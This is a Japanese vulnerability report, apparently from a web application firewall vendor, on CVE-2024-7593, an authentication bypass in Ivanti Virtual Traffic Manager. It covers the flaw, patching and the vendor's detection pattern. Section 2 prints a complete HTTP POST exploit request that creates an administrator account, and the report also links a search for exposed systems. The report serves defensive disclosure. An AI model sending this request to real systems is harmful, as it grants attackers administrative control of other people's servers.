[2025.03 脆弱性レポート] Ivanti vTM 認証バイパス

本脆弱性は、IvantivTM に認証バイパスの脆弱性が存在するもので、攻撃者は、Web インターフェース内のすべてのセクションに対してロード可能な wizard.cgi へのアクセス制御をバイパスすることで、任意の管理者アカウントを作成することができる。

この脆弱性は、IvantivTMのバージョン22.2R1、22.7R2などでパッチが適用されており、AIWAFは2235を追加することで対応している： Ivanti vTM Authentication Bypassパターンを2025年2月のパターンアップデートに追加することで対応し、関連する脆弱性の監視を継続する。

1. 概要

Ivanti Virtual Traffic Manager（vTM）は、ソフトウェアベースのアプリケーションデリバリコントローラ（ADC）であり、我々は最近、このプラットフォームで発見された認証バイパスの脆弱性CVE-2024-7593を分析した。

ソース : https://thehackernews.com/2024/10/ivanti-endpoint-manager-flaw-actively.html

2. 攻撃タイプ

CVE-2024-7593 は、Ivanti vTM における認証バイパスの脆弱性であり、本製品の認証アルゴリズ ムの欠陥により、攻撃者は、ウェブインターフェイス内の全てのセクションのロードを許可する wizard.cgi へのアクセス制御をバイパスすることで、任意の管理者アカウントを作成することができます。

攻撃者は、wizard.cgi へのアクセス制御をバイパスするために、影響を受けるエンドポイントに送信されるリクエストのパラメータのうち、error パラメータの値を 1 に設定することで、wizard.cgi へのアクセス制御をバイパスすることができます。

その後、section パラメータを使用してアカウント作成用のセクションを取得し、リクエストの Body に create_user=Create (管理者アカウントの作成リクエスト)、create_form_submitted=フォーム設定と管理者アカウントの作成情報を指定して送信することで、CSRF 対策による検知を回避することができます。

アクセス制御をバイパスして管理者アカウントを作成する攻撃 リクエスト：

POST /apps/zxtm/wizard.fcgi?error=1&section=Access Management:LocalUsers HTTP/1.1
Content-Length: 108
Content-Type: application/x-www-form-urlencoded
Host: www.test.com
User-Agent: HTTPie
​
_form%2Bsubmitted=form&create_user=Create&group=admin&newusername=attacker&password1=hacker&password2=hacker

3. 対応

Ivanti vTMはCVE-2024-7593に対応したパッチをリリースしているため、同製品のユーザーは以下の写真のようにバージョンごとに特定バージョン以上にパッチを当てて対応する必要があり、弊社AIWAF製品はパターン2235で対応しています： 2025年2月のパターンアップデートで追加された「Ivanti vTM Authentication Bypass」で対応します。

ソース : https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593

4. 結論

Ivanti vTMは主に複雑なIT環境を持つ大企業で使用されており、この脆弱性がCVSSスコア9.8という驚異的な数値で特定されたため、CISAはすぐにこの脆弱性を「緊急パッチリスト」であるKEVに掲載した。

さらに、OSINTサービスの1つであるfofa.infoによると、2025年3月時点で公開されているvTMシステムは260以上あり、これらの製品がCVE-2024-7593の脆弱性の標的になる可能性があり、できるだけ早く最新バージョンにパッチを当てる必要があることを意味している。

ソース : https://en.fofa.info/result?qbase64=YXBwPSJWaXJ0dWFsLVRyYWZmaWMtTWFuYWdlciI%3D

当社のAIWAF製品は、Ivanti製品の脆弱性に対応するためのパターンを開発しており、今後も関連する脆弱性が発見された場合には迅速に対応していく。

5. 参考文献

• https://nvd.nist.gov/vuln/detail/cve-2024-7593
• https://socradar.io/critical-ivanti-vtm-vulnerability-exploited-cve-2024-7593-pgadmin-flaw-could-expose-data-cve-2024-9014/